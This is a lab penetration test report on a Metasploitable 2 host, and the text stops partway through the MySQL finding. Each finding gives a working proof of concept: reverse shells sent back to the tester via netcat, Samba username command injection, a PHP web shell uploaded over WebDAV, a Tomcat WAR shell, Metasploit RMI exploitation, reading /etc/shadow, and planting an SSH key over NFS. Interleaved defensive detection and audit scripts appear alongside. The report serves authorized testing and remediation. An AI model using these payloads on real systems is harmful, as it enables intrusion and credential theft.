Network Pentesting - Core Concepts

Basics of Network Pentesting.

Domain | Description | Common Tools
Scoping & Planning | Define objectives, scope, targets, testing constraints, and rules of engagement. | Documentation, Asset Inventory
Network Fundamentals | Understand TCP/IP, OSI, IP addressing, subnetting, routing, and common protocols. | Wireshark, tcpdump
Reconnaissance | Gather information about the target network and identify potential assets. | Whois, dig, Amass
Host Discovery | Identify live hosts and network assets. | Nmap, Masscan, fping
Port Scanning | Discover exposed ports and accessible services. | Nmap, RustScan, Masscan
Service Enumeration | Identify services, versions, configurations, and accessible resources. | Nmap NSE, Netcat, smbclient
Protocol Enumeration | Assess network protocols such as SMB, DNS, SNMP, FTP, SSH, SMTP, and NFS. | Nmap NSE, enum4linux, snmpwalk
Vulnerability Assessment | Identify vulnerabilities, insecure configurations, and outdated software. | Nessus, OpenVAS, Nuclei
Exploitation | Validate identified vulnerabilities through controlled testing. | Metasploit, Impacket
Privilege Escalation | Determine whether elevated privileges can be obtained after initial access. | WinPEAS, LinPEAS
Post-Exploitation | Assess the impact of compromise and identify accessible resources. | Native OS Tools, Impacket
Reporting | Document findings, evidence, impact, and remediation recommendations. | Dradis, PlexTrac

Sample Penetration Testing Report for Metasploitable

Network Penetration Test Report for Metasploitable.

Client / System: Authorized internal lab host (Metasploitable 2)
Target: 192.168.229.132 — metasploitable.localdomain
Tester host: 192.168.229.131
Assessment window: 2026-06-14
Report date: 2026-06-15
Classification: CONFIDENTIAL — for the system owner only
Assessment type: Authorized black box internal network penetration test


Table of Contents

  1. Executive Summary
  2. Scope, Methodology & Tooling
  3. Risk Rating Summary
  4. Findings Summary Table (Quick Look)
  5. Host & Service Inventory (TCP + UDP)
  6. Detailed Findings
    • Critical (C1–C13)
    • High (H1–H6)
    • Medium (M1–M6)
    • Low / Informational (L1–L8)
  7. Attack Narrative
  8. Strategic Remediation Roadmap
  9. Appendix A — Per-Port Verification Matrix
  10. Appendix B — CVSS Vectors & References

1. Executive Summary

The host 192.168.229.132 is fully and trivially compromised. During the assessment, thirteen (13) independent paths to remote code execution were identified, and all thirteen were exploited live. Of these, ten yield an interactive root (uid=0) shell with no credentials whatsoever; the remaining paths yield service-level code execution that escalates to root through the other findings.

The underlying operating system (Ubuntu 8.04 LTS, Linux kernel 2.6.24, i686) is End-of-Life and unpatchable in place. Multiple network services ship with intentional backdoors, default credentials, or insecure default configurations.

A single unauthenticated attacker with network reachability obtains complete loss of confidentiality, integrity, and availability within seconds. No user interaction, no chaining, and no credentials are required.

Overall risk rating: CRITICAL.

Primary recommendation: This host cannot be remediated in place. It must be isolated from the network immediately and rebuilt on a supported, patched operating system with a hardened service baseline.


2. Scope, Methodology & Tooling

Scope. Single IPv4 host 192.168.229.132. All testing was authorized and conducted against an isolated lab environment. Proof-of-concept payloads were non-destructive and read-only by intent; any artifact created to evidence a finding (e.g. a single empty marker file) was removed before completion.

Methodology. The engagement followed a standard network penetration-testing workflow aligned to the PTES and NIST SP 800-115 phases:

  1. Discovery — full TCP (1–65535) and full UDP (1–65535) port sweeps.
  2. Enumeration — service/version fingerprinting and NSE vulnerability scripts.
  3. Vulnerability analysis — mapping services to known CVEs and misconfigurations.
  4. Exploitation — live validation of each candidate finding to code execution or authenticated access.
  5. Post-exploitation — privilege confirmation (id, getuid), evidence collection, and cleanup.
  6. Reporting — severity scoring (CVSS 3.1) and prioritized remediation.

Tooling. nmap (SYN, -sV, -sU, NSE vuln scripts, run privileged as root), netcat, hydra, medusa, smbclient, curl, mysql/psql clients, the Metasploit Framework (java_rmi_server), a custom Ruby DRb client, and manual exploit verification.

Scan-coverage statement. Full TCP and full privileged UDP (nmap -sU -p-, --min-rate 5000) were completed — 29 TCP and 7 UDP ports open. No port range was omitted.


3. Risk Rating Summary

Severity | Count | Live-Open
Critical (9.0–10.0) | 13 | 13 / 13
High (7.0–8.9) | 6 | Open
Medium (4.0–6.9) | 6 | Open
Low / Info | 8 | Open

Unauthenticated root paths demonstrated: 10
Total code-execution paths demonstrated: 13


4. Findings Summary Table (Quick Look)

All findings, ordered Critical → Informational. CVSS = CVSS 3.1 base score.

S.No | ID | Vulnerability | Affected Port/Service | Severity | CVSS | Status
1 | C1 | vsftpd 2.3.4 backdoor (CVE-2011-2523) | 21 / ftp | Critical | 10.0 | Open
2 | C2 | UnrealIRCd 3.2.8.1 backdoor (CVE-2010-2075) | 6667,6697 / irc | Critical | 10.0 | Open
3 | C3 | Samba username map script injection (CVE-2007-2447) | 139,445 / smb | Critical | 10.0 | Open
4 | C4 | Ingreslock root bindshell | 1524 | Critical | 10.0 | Open
5 | C5 | distcc daemon command execution (CVE-2004-2687) | 3632 / distccd | Critical | 9.8 | Open
6 | C6 | Distributed Ruby (DRb) RCE via $SAFE bypass | 8787 / drb | Critical | 9.8 | Open
7 | C7 | Java RMI registry classloader RCE | 1099 / java-rmi | Critical | 9.8 | Open
8 | C8 | NFS export / * with no_root_squash | 2049 / nfs | Critical | 9.8 | Open
9 | C9 | r-services root trust (+ in hosts.equiv) | 512–514 | Critical | 9.8 | Open
10 | C10 | WebDAV PHP upload RCE | 80 / http | Critical | 9.8 | Open
11 | C11 | Tomcat Manager default credentials | 8180 / http | Critical | 9.8 | Open
12 | C12 | MySQL root with blank password | 3306 / mysql | Critical | 9.1 | Open
13 | C13 | PostgreSQL default credentials | 5432 / postgresql | Critical | 9.1 | Open
14 | H1 | VNC weak password | 5900 / vnc | High | 8.8 | Open
15 | H2 | Default OS creds msfadmin:msfadmin (SSH/Telnet) | 22, 23 | High | 8.1 | Open
16 | H3 | Deliberately vulnerable web apps (CVE-2007-5423 / CVE-2005-2877) | 80 / http | High | 8.0 | Open
17 | H4 | phpMyAdmin exposed | 80 / http | High | 7.5 | Open
18 | H5 | Anonymous SMB share access | 139,445 / smb | High | 7.5 | Open
19 | H6 | ProFTPD 1.3.1 mod_sql CVEs (CVE-2009-0542/0543) | 2121 / ftp | High | 7.5 | Open
20 | M6 | DNS open recursive resolver (BIND 9.4.2) | 53/udp | Medium | 6.5 | Open
21 | M2 | SMBv1 enabled (NT LM 0.12) | 139,445 / smb | Medium | 5.9 | Open
22 | M5 | Cleartext protocols in use | 21,23,80,512–514,5900 | Medium | 5.9 | Open
23 | M4 | OpenSSH/Debian weak-PRNG era keys (CVE-2008-0166) | 22 / ssh | Medium | 5.6 | Open
24 | M1 | SMTP user enumeration (VRFY/EXPN) | 25 / smtp | Medium | 5.3 | Open
25 | M3 | Legacy / cleartext FTP daemons | 21, 2121 / ftp | Medium | 5.3 | Open
26 | L1 | End-of-Life OS (Ubuntu 8.04, kernel 2.6.24) | host | Low/Info | n/a | Open
27 | L2 | phpinfo.php exposed | 80 / http | Low/Info | n/a | Open
28 | L3 | Verbose version banners | multiple | Low/Info | n/a | Open
29 | L4 | Default/test directories present | 80 / http | Low/Info | n/a | Open
30 | L5 | HTTP TRACE / WebDAV verbs enabled | 80 / http | Low/Info | n/a | Open
31 | L6 | AJP13 connector exposed | 8009 / ajp13 | Low/Info | n/a | Open
32 | L7 | X11 server exposed (access-controlled) | 6000 / X11 | Low/Info | n/a | Open
33 | L8 | UDP attack-surface coverage confirmation | UDP range | Low/Info | n/a | Open

5. Host & Service Inventory

5.1 TCP (full range 1–65535 — 29 ports open)

Port | Service | Version
21 | ftp | vsftpd 2.3.4
22 | ssh | OpenSSH 4.7p1 Debian 8ubuntu1
23 | telnet | Linux telnetd (cleartext)
25 | smtp | Postfix
80 | http | Apache 2.2.8 (DAV/2), PHP 5.2.4
111 | rpcbind | RPC #100000
139 / 445 | smb | Samba 3.0.20-Debian (SMBv1)
512 / 513 / 514 | exec / login / shell | r-services (rexec / rlogin / rsh)
1099 | java-rmi | GNU Classpath rmiregistry
1524 | ingreslock | root bindshell
2049 | nfs | NFS v2–v4
2121 | ftp | ProFTPD 1.3.1
3306 | mysql | MySQL 5.0.51a-3ubuntu5
3632 | distccd | distccd v1 (GCC 4.2.4)
5432 | postgresql | PostgreSQL 8.3.1
5900 | vnc | VNC protocol 3.3
6000 | X11 | X11 (access-controlled)
6667 / 6697 | irc | UnrealIRCd 3.2.8.1
8009 | ajp13 | Apache Jserv / Tomcat connector
8180 | http | Apache Tomcat/Coyote JSP 1.1
8787 | drb | Distributed Ruby (Ruby 1.8)
45190 / 56610 / 58250 / 59764 | RPC | mountd / dynamic RPC

5.2 UDP (privileged nmap -sU -p- — 7 ports open)

Port | Service | Version
53/udp | domain | ISC BIND 9.4.2 — recursion enabled (open resolver)
111/udp | rpcbind | RPC #100000
137/udp | netbios-ns | Samba NetBIOS (workgroup WORKGROUP)
2049/udp | nfs | NFS
50783/udp | rpc-dynamic | rpc.statd
54158/udp | rpc-dynamic | nlockmgr
58641/udp | mountd | RPC #100005

161/udp (SNMP) and 69/udp (TFTP) were confirmed closed under the privileged scan. An earlier unprivileged probe falsely flagged 69/udp; the authoritative privileged scan corrected it.
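The inventory above was compiled by hand from the scan output. As an added example (not part of this report and not the tester's tooling), the Python script below shows how the same inventory can be built from nmap's -oX XML and diffed against an owner-approved baseline, so that listeners nobody can account for (such as 1524/tcp here) surface automatically. The XML fragment and the baseline are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Constructed nmap -oX fragment covering a few of the ports in the inventory above.
# Illustration only, not the scan output behind this report.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="192.168.229.132" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1"/></port>
      <port protocol="tcp" portid="1524"><state state="open"/><service name="ingreslock"/></port>
      <port protocol="udp" portid="53"><state state="open"/><service name="domain" product="ISC BIND" version="9.4.2"/></port>
      <port protocol="udp" portid="161"><state state="closed"/><service name="snmp"/></port>
    </ports>
  </host>
</nmaprun>
"""

# Hypothetical approved baseline: (ip, protocol, port) tuples the owner says should listen.
APPROVED_BASELINE = {
    ("192.168.229.132", "tcp", 22),
    ("192.168.229.132", "udp", 53),
}


def parse_open_ports(xml_text):
    """Map (ip, protocol, port) -> 'name product version' for every port in state open.

    Closed and filtered ports are dropped so the result matches the inventory tables.
    """
    inventory = {}
    for host in ET.fromstring(xml_text).iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            fields = [] if svc is None else [svc.get(k) for k in ("name", "product", "version")]
            label = " ".join(f for f in fields if f)
            inventory[(ip, port.get("protocol"), int(port.get("portid")))] = label
    return inventory


def unexpected_listeners(inventory, baseline):
    """Open ports the baseline does not account for: each one is a finding to triage."""
    return sorted(key for key in inventory if key not in baseline)


def missing_listeners(inventory, baseline):
    """Baseline entries not seen open: a service outage or a scan-coverage gap."""
    return sorted(key for key in baseline if key not in inventory)


if __name__ == "__main__":
    inv = parse_open_ports(SAMPLE_NMAP_XML)
    for ip, proto, port in unexpected_listeners(inv, APPROVED_BASELINE):
        print(f"UNEXPECTED {ip} {port}/{proto}: {inv[(ip, proto, port)]}")
    for ip, proto, port in missing_listeners(inv, APPROVED_BASELINE):
        print(f"MISSING    {ip} {port}/{proto}")
```

Run against a real scan, the same diff doubles as the scan-coverage statement: a baseline entry that never shows up open is either an outage or a port range that was not scanned.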


6. Detailed Findings

Each finding lists: Description, Affected component, Severity (CVSS 3.1), Proof of Concept, Impact, and Mitigation.


CRITICAL


C1 — vsftpd 2.3.4 Backdoor (CVE-2011-2523)

  • Affected component: FTP service, TCP 21 (vsftpd 2.3.4)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. Between 30 June and 3 July 2011 the official vsftpd-2.3.4 source tarball on the project's master site was replaced with a maliciously modified version. The trojan adds a hidden trigger to the login routine: when a username ending in the two-byte smiley :) is supplied, the daemon forks a shell and binds it to TCP 6200. Any client that then connects to 6200 receives a fully interactive shell running as root, with no password and no further interaction. Because the trigger is in the authentication path, it fires before any real credential check.

Proof of Concept.

# Step 1 — trip the backdoor with a ":)" username (password is irrelevant)
$ nc 192.168.229.132 21
USER backdoored:)
PASS anything

# Step 2 — connect to the root shell the backdoor opened on 6200
$ nc 192.168.229.132 6200
id
=> uid=0(root) gid=0(root)
uname -a
=> Linux metasploitable 2.6.24-16-server ... i686 GNU/Linux

Impact. Immediate, unauthenticated, remote root shell — full compromise of confidentiality, integrity and availability.

Mitigation.

  • Remove the trojaned vsftpd package immediately and rebuild the host from trusted installation media (the binary cannot be trusted).
  • Only install packages from the distribution's signed repositories; verify GPG signatures / checksums against the upstream advisory.
  • Restrict FTP exposure with host firewalling and prefer SFTP/FTPS over plain FTP.

C2 — UnrealIRCd 3.2.8.1 Backdoor (CVE-2010-2075)

  • Affected component: IRC service, TCP 6667 / 6697 (UnrealIRCd 3.2.8.1)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. The UnrealIRCd 3.2.8.1 release archive distributed in late 2009 / 2010 was compromised at the source. The backdoor inspects raw lines received from clients: any line beginning with the two bytes AB is treated as a system command and passed to system(), executing as the user running ircd (root on this host). No authentication, channel membership, or registration is required — a raw TCP connection is sufficient.

Proof of Concept.

# Open a listener on the tester first: nc -lvnp 9999
$ nc 192.168.229.132 6667
AB; id | nc 192.168.229.131 9999

# Listener receives:
=> uid=0(root) gid=0(root)

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Remove the backdoored binary and rebuild/reinstall UnrealIRCd from a verified, signed source; rotate any secrets the host held.
  • Validate downloaded source against published PGP signatures before building.
  • Firewall the IRC ports to trusted networks only; if IRC is not required, disable it.
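Both C1 and C2 have triggers that a network sensor can recognise on the wire before any shell is used. The Python detector below is an added example (not from this report): it runs over constructed records of client-to-server lines, in the shape a sensor with TCP reassembly might emit, and alerts on the vsftpd ":)" login trigger, a follow-up connection from the same source to 6200/tcp, and the UnrealIRCd "AB" line prefix. The record format, port sets and sample flows are assumptions.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Alert:
    rule: str
    src: str
    dst_port: int
    evidence: str


# Constructed sensor records, not captured traffic:
# (client_ip, server_port, one reassembled client-to-server line).
SAMPLE_FLOWS = [
    ("10.0.0.5", 21, "USER alice"),
    ("10.0.0.5", 21, "PASS hunter2"),
    ("10.0.0.9", 21, "USER backdoored:)"),            # C1 trigger
    ("10.0.0.9", 6200, "id"),                          # C1 shell use, same source
    ("10.0.0.7", 6667, "NICK bob"),
    ("10.0.0.7", 6667, "PRIVMSG #ops :ABend"),         # 'AB' not at line start: benign
    ("10.0.0.7", 6667, "AB; id | nc 10.0.0.7 9999"),  # C2 trigger
]

FTP_PORTS = {21, 2121}
IRC_PORTS = {6667, 6697}
VSFTPD_SHELL_PORT = 6200
FTP_USER = re.compile(r"^USER\s+(\S+)")


def detect(flows):
    """Return Alerts for the vsftpd and UnrealIRCd backdoor triggers.

    A connection to 6200/tcp is only alerted when the same source has already
    sent the ':)' login, which keeps unrelated traffic to that port quiet.
    """
    alerts = []
    tripped_sources = set()
    for src, dport, payload in flows:
        if dport in FTP_PORTS:
            m = FTP_USER.match(payload)
            if m and m.group(1).endswith(":)"):
                alerts.append(Alert("vsftpd-2.3.4-backdoor-trigger", src, dport, payload))
                tripped_sources.add(src)
        elif dport in IRC_PORTS and payload.startswith("AB"):
            # The backdoor keys on the first two bytes of the line, so every
            # line that starts with AB is worth an alert, whatever follows.
            alerts.append(Alert("unrealircd-3.2.8.1-backdoor-trigger", src, dport, payload))
        elif dport == VSFTPD_SHELL_PORT and src in tripped_sources:
            alerts.append(Alert("vsftpd-backdoor-shell-use", src, dport, payload))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_FLOWS):
        print(f"{a.rule:36} {a.src:>10} -> :{a.dst_port:<5} {a.evidence!r}")
```

Because both services speak cleartext, the same two string checks translate directly into IDS content rules; the stateful part (tying 6200/tcp to a prior trigger) is what keeps the 6200 alert from firing on unrelated traffic.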

C3 — Samba "username map script" Command Injection (CVE-2007-2447)

  • Affected component: SMB service, TCP 139 / 445 (Samba 3.0.20)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. When Samba is configured with the username map script option, the supplied username is passed to /bin/sh -c to run the mapping script. Samba 3.0.x fails to sanitize shell metacharacters in the username, so an attacker can embed a command substitution (`...`) in the username field of the session setup. The injected command runs as root, before authentication, because the mapping happens during username resolution.

Proof of Concept.

# Open listener: nc -lvnp 9999
$ smbclient //192.168.229.132/tmp \
-U "/=`nohup nc 192.168.229.131 9999 -e /bin/sh`" -N

# Listener receives a root shell from .132:
id => uid=0(root) gid=0(root) (hostname: metasploitable)

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Upgrade Samba to a current, supported release.
  • Remove username map script from smb.conf; if username mapping is required, use a static username map file (no shell invocation).
  • Restrict SMB to trusted networks; disable SMBv1 (see M2).

C4 — Ingreslock Root Bindshell (TCP 1524)

  • Affected component: TCP 1524 (pre-bound /bin/sh)
  • Severity: Critical — CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H)

Description. Port 1524 (nominally "ingreslock") has a raw /bin/sh bound to it listening for connections. Connecting yields an interactive root shell with no authentication of any kind. This is a classic backdoor/persistence artifact and is itself strong evidence that the host has already been compromised by a third party.

Proof of Concept.

$ nc 192.168.229.132 1524
id => uid=0(root) gid=0(root)
whoami => root

Impact. Immediate, unauthenticated, remote root shell. Also an indicator of prior compromise.

Mitigation.

  • Treat the host as compromised; initiate incident response and rebuild.
  • Kill the listener, identify the parent process and its persistence mechanism (init scripts, cron, inetd), and remove it.
  • Deploy host-based firewalling (default-deny) and file-integrity monitoring.

C5 — distcc Daemon Command Execution (CVE-2004-2687)

  • Affected component: distccd, TCP 3632
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. distcc distributes compiler jobs across machines. When distccd is started without --allow access control (as here), it accepts compilation jobs from any network client and executes the supplied compiler command line. By crafting a job whose "compiler" invocation is an arbitrary command, an attacker runs code as the daemon user without authentication.

Proof of Concept.

$ nmap -p 3632 --script distcc-cve2004-2687 \
--script-args="distcc-cve2004-2687.cmd='id'" 192.168.229.132
=> uid=1(daemon) gid=1(daemon) groups=1(daemon)

Impact. Unauthenticated remote code execution as daemon. On this EOL host the shell escalates to root trivially (kernel exploits or any of the local root paths).

Mitigation.

  • Disable distccd if not required.
  • If required, bind it to localhost and enforce --allow <trusted-subnet> plus a firewall; never expose it to untrusted networks.

C6 — Distributed Ruby (DRb) RCE via $SAFE Bypass

  • Affected component: Distributed Ruby service, TCP 8787 (Ruby 1.8, front object TimeServer)
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. Distributed Ruby (DRb) exposes a Ruby object over the network; clients invoke its methods remotely. DRb's DRbObject#method_missing forwards arbitrary method calls to the server, so a client can call any method on the remote object — including private methods — via method_missing(:send, …).

The textbook exploit (obj.instance_eval("`cmd`")) failed here because the server runs with Ruby taint protection at $SAFE >= 1. Strings arriving over the network are marked tainted, and at $SAFE >= 1 Ruby refuses to eval, instance_eval, system, or backtick a tainted string, raising SecurityError: Insecure operation.

The protection was bypassed by pivoting to Kernel#syscall, which performs a raw Linux system call and is not subject to the taint check. Reaching it through DRb dispatch yields an attacker-controlled syscall primitive — functionally equivalent to arbitrary code execution as the DRb service user. This demonstrates that $SAFE is not a security boundary (it was deprecated and removed in modern Ruby for exactly this reason).

Proof of Concept.

require 'drb'
DRb.start_service
o = DRbObject.new(nil, "druby://192.168.229.132:8787")

# Baseline: the documented vectors are blocked by $SAFE -------------------
o.method_missing(:send, :eval, "1+1")
# => SecurityError: Insecure operation - eval (tainted string)
o.method_missing(:send, :instance_eval, "1+1")
# => SecurityError: Insecure operation - instance_eval

# Bypass: syscall is NOT taint-checked ------------------------------------
# (i686 syscall numbers: getpid=20, creat=8, unlink=10)

o.method_missing(:send, :syscall, 20) # getpid
# => 5151 (remote PID — primitive confirmed)

o.method_missing(:send, :syscall, 8,
"/tmp/DRB_RCE_PROOF_1781515202\0", 0666) # creat()
# => 5 (file descriptor — arbitrary file write)

o.method_missing(:send, :syscall, 10,
"/tmp/DRB_RCE_PROOF_1781515202\0") # unlink()
# => 0 (cleanup — proof artifact removed)

Out-of-band verification. The file created via the DRb syscall was independently confirmed on the target (before deletion) through the C7 RMI root session:

meterpreter > ls /tmp
100666/rw-rw-rw- 0 fil 2026-06-15 14:50:04 DRB_RCE_PROOF_1781515202

Impact. Unauthenticated arbitrary syscall execution (open/read/write/unlink/exec) as the DRb service user — full remote code execution. The $SAFE sandbox provides no meaningful protection.

Mitigation.

  • Do not expose DRb to untrusted networks; bind it to localhost and enforce a DRb::ACL allow-list.
  • Never rely on $SAFE/taint as a sandbox (deprecated/removed in modern Ruby).
  • Decommission this EOL Ruby 1.8 service; if remote objects are required, use an authenticated, schema-constrained RPC (e.g. gRPC) instead of DRb.

C7 — Java RMI Registry Classloader RCE

  • Affected component: Java RMI registry, TCP 1099
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Java RMI registry is running with remote class loading enabled (java.rmi.server.useCodebaseOnly=false, the insecure historical default). An attacker advertises a remote codebase (an HTTP URL) in an RMI call; the server downloads and instantiates the attacker's class, executing its code inside the JVM. Because the JVM runs as root on this host, the result is unauthenticated remote root.

Proof of Concept.

msf6 > use exploit/multi/misc/java_rmi_server
msf6 > set RHOSTS 192.168.229.132
msf6 > set SRVHOST 192.168.229.131
msf6 > set payload java/meterpreter/reverse_tcp
msf6 > set LHOST 192.168.229.131
msf6 > exploit

[*] 192.168.229.132:1099 - Replied to request for payload JAR
[*] Meterpreter session 1 opened (root @ metasploitable)
meterpreter > getuid
Server username: root

Impact. Immediate, unauthenticated, remote root code execution.

Mitigation.

  • Set -Djava.rmi.server.useCodebaseOnly=true and configure a restrictive RMISecurityManager policy.
  • Bind the registry to localhost; firewall 1099 from untrusted networks.
  • Patch/replace the EOL JVM; require TLS and authentication on RMI endpoints.

C8 — NFS Export / * with no_root_squash

  • Affected component: NFS, TCP/UDP 2049 (+ rpcbind 111, mountd)
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The server exports the entire root filesystem (/) to any host (*) with the no_root_squash option. Normally NFS maps a remote client's root to the unprivileged nobody user (root_squash); with no_root_squash, a remote root user retains root on the export. Any attacker who can mount the share therefore has unrestricted read/write to every file on the system, including /etc/shadow, /root/.ssh/, and the ability to plant SUID binaries.

Proof of Concept.

$ nmap --script nfs-showmount 192.168.229.132
=> / *

$ nmap --script nfs-statfs,nfs-ls 192.168.229.132
access: Read Lookup Modify Extend Delete on /
listing: /root /etc lost+found ...

# Weaponization (illustrative): mount and obtain root
$ mount -o nolock 192.168.229.132:/ /mnt
$ echo "<attacker pubkey>" >> /mnt/root/.ssh/authorized_keys # → root SSH login
# — or place a SUID-root shell, or read /mnt/etc/shadow for offline cracking

Impact. Unauthenticated read/write to the entire filesystem → trivial root and full data disclosure.

Mitigation.

  • Remove the * wildcard; export only the specific directories required, to explicit host/subnet entries.
  • Always set root_squash (and all_squash where appropriate).
  • Use NFSv4 with Kerberos (sec=krb5p) and firewall RPC/NFS ports.

C9 — r-services Root Trust (rsh / rlogin, TCP 512–514)

  • Affected component: rexec/rlogin/rsh, TCP 512–514
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Berkeley r-services use host-based trust files (/etc/hosts.equiv, ~/.rhosts). Here these files contain a wildcard +, which trusts every host and every user. As a result a remote rsh/rlogin as root is accepted without any password, provided the request originates from a privileged source port (which an attacker controls).

Proof of Concept.

$ rsh -l root 192.168.229.132 id
=> uid=0(root) gid=0(root) (hostname: metasploitable)

# Full password-hash disclosure for offline cracking
$ rsh -l root 192.168.229.132 "cat /etc/shadow"
=> root:$1$/avpfBJ1$...:... (MD5 crypt)

Impact. Immediate passwordless root; full disclosure of all credential hashes.

Mitigation.

  • Disable and remove r-services (rsh-server, rlogin, rexec).
  • Replace with SSH using key-based authentication.
  • Never use + in hosts.equiv or .rhosts.
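C8 and C9 both come down to a trust file that grants everything to everyone, and both are caught by reading the file. The Python below is an added example, not tooling from this report: it parses /etc/exports entries and hosts.equiv/.rhosts lines, flags the wildcard host, the whole-root export and no_root_squash for NFS, and the "+" wildcard for the r-services. The weak and hardened file contents are constructed to mirror the findings above, not copied from the host.

```python
# Constructed /etc/exports in the weak shape described in C8, and a hardened
# counterpart. Neither is the host's real file.
WEAK_EXPORTS = """# /etc/exports
/           *(rw,sync,no_root_squash)
/srv/share  192.168.229.0/24(rw,sync)
"""
HARDENED_EXPORTS = """
/srv/share  192.168.229.10(rw,sync,root_squash) 192.168.229.11(ro,sync,root_squash)
"""

# Constructed hosts.equiv / .rhosts contents for C9: a lone '+' is the
# wildcard the finding describes.
WEAK_HOSTS_EQUIV = "+\n"
HARDENED_HOSTS_EQUIV = "# explicit host and user only\nbuild01.example.internal builduser\n"


def parse_exports(text):
    """Yield (path, client, options) for each client entry of an exports file.

    '/a *(rw)' and '/a (rw)' both export to any host (exportfs warns about the
    second form but honours it), so an empty client is reported as '*'.
    """
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *clients = line.split()
        for client in clients:
            host, _, opts = client.partition("(")
            options = set(filter(None, opts.rstrip(")").split(",")))
            yield path, host or "*", options


def audit_exports(text):
    """(severity, message) for each weak export setting found."""
    findings = []
    for path, host, options in parse_exports(text):
        if host == "*":
            findings.append(("HIGH", f"{path}: exported to every host"))
        if "no_root_squash" in options:
            # root_squash is the kernel default; only the explicit opt-out is dangerous.
            findings.append(("CRITICAL", f"{path} -> {host}: no_root_squash keeps remote root as root"))
        if path == "/":
            findings.append(("HIGH", f"{path} -> {host}: whole root filesystem exported"))
    return findings


def audit_trust_file(text):
    """Flag '+' wildcards in hosts.equiv/.rhosts (host field, and user field if present)."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()
        if fields and fields[0] == "+":
            findings.append(("CRITICAL", f"line {lineno}: '+' trusts every host"))
        if len(fields) > 1 and fields[1] == "+":
            findings.append(("CRITICAL", f"line {lineno}: '+' trusts every user on that host"))
    return findings


if __name__ == "__main__":
    for label, text in (("weak", WEAK_EXPORTS), ("hardened", HARDENED_EXPORTS)):
        print(f"exports ({label}):", audit_exports(text) or "clean")
    for label, text in (("weak", WEAK_HOSTS_EQUIV), ("hardened", HARDENED_HOSTS_EQUIV)):
        print(f"hosts.equiv ({label}):", audit_trust_file(text) or "clean")
```

On a live system the same checks belong in configuration management or a file-integrity baseline, so that a reintroduced "*" or "+" is caught at the next run rather than at the next penetration test.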

C10 — WebDAV PHP Upload RCE

  • Affected component: Apache mod_dav at /dav/, TCP 80
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The /dav/ WebDAV collection permits unauthenticated HTTP write methods (PUT). An attacker uploads a .php web shell into a directory that Apache is configured to execute as PHP, then requests it to run arbitrary commands as the web-server user www-data.

Proof of Concept.

# Upload a minimal command web shell
$ printf '<?php system($_GET["c"]); ?>' > shell.php
$ curl -T shell.php http://192.168.229.132/dav/shell.php
=> 201 Created

# Execute commands
$ curl "http://192.168.229.132/dav/shell.php?c=id"
=> uid=33(www-data) gid=33(www-data)

# Cleanup (PoC removed)
$ curl -X DELETE http://192.168.229.132/dav/shell.php
=> 204 No Content

Impact. Unauthenticated code execution as www-data; escalates to root via the local root paths on this host.

Mitigation.

  • Disable WebDAV write methods (PUT/DELETE/MOVE) or require authentication (<Limit> / Require valid-user).
  • Configure upload directories with php_admin_flag engine off and RemoveHandler/RemoveType so uploaded files cannot execute.
  • Run Apache with least privilege and a restrictive document-root policy.

C11 — Tomcat Manager Default Credentials

  • Affected component: Apache Tomcat Manager, TCP 8180
  • Severity: Critical — CVSS 9.8 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)

Description. The Tomcat Manager application is reachable and accepts the default credentials tomcat:tomcat. The Manager allows deployment of arbitrary web application archives (WAR files); an attacker deploys a WAR containing a JSP web shell, achieving code execution as the Tomcat service user.

Proof of Concept.

$ curl -u tomcat:tomcat http://192.168.229.132:8180/manager/html
=> HTTP/1.1 200 OK (Manager UI rendered — credentials valid)

# Weaponization: deploy a JSP shell WAR
$ curl -u tomcat:tomcat -T shell.war \
"http://192.168.229.132:8180/manager/deploy?path=/shell"
$ curl "http://192.168.229.132:8180/shell/shell.jsp?cmd=id"
=> code execution as the Tomcat user

Impact. Remote code execution via default credentials — effectively unauthenticated.

Mitigation.

  • Remove or change default Manager/Host-Manager accounts in tomcat-users.xml; use strong unique passwords.
  • Restrict the Manager app by source IP (RemoteAddrValve) or disable it in production.
  • Run Tomcat as a low-privilege service account.

C12 — MySQL root with Blank Password

  • Affected component: MySQL 5.0.51a, TCP 3306
  • Severity: Critical — CVSS 9.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L)

Description. The MySQL root account has an empty password and the server accepts connections from any host (root@%). Beyond full database access, a MySQL superuser can write files to disk (SELECT ... INTO OUTFILE) into web roots, or load a User-Defined Function (UDF) to execute OS commands.

